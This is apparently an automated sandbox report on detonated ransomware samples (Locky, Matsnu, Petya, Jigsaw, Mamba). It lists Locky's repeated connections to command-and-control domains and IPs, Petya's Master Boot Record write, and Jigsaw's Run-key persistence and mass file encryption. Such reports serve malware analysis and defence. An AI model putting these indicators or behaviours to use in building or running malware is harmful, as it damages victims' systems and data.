US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp

Files

memory/2272-0-0x0000000000C40000-0x0000000000C44000-memory.dmp

memory/2272-1-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-3-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-5-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-9-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-10-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-12-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-14-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-15-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-17-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-19-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-21-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-23-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-25-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-27-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-28-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-31-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-32-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-34-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-35-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-36-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-38-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-39-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-41-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-42-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-44-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-45-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-46-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-48-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-50-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-52-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-54-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-56-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-58-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-60-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-62-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2272-64-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1720s

Max time network

1733s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2420 -ip 2420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 368

Network

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:00

Platform

win10v2004-20240508-en

Max time kernel

2s

Max time network

9s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp

Files

memory/4308-0-0x000000000041A000-0x0000000000427000-memory.dmp

memory/4308-1-0x0000000000400000-0x000000000043F000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1562s

Command Line

"C:\Users\Admin\AppData\Local\Temp\out.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\out.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\out.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\out.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\out.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\out.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\out.exe

"C:\Users\Admin\AppData\Local\Temp\out.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 36

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1790s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Signatures

Locky

ransomware locky

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 8.8.8.8:53 greootc.eu udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 greootc.eu tcp

Files

memory/2228-0-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2228-1-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-3-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-7-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-9-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-12-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-15-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-16-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-18-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-20-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-21-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-23-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-24-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-26-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-28-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-29-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-31-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-33-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-34-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-36-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-37-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-40-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-41-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-45-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-46-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-48-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-50-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-52-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-53-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-55-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-57-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-58-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-60-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-62-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-63-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-64-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2228-65-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1800s

Max time network

1564s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Renames multiple (2015) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_italic.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\ast.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Groove.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_hyperlink.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\currency.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
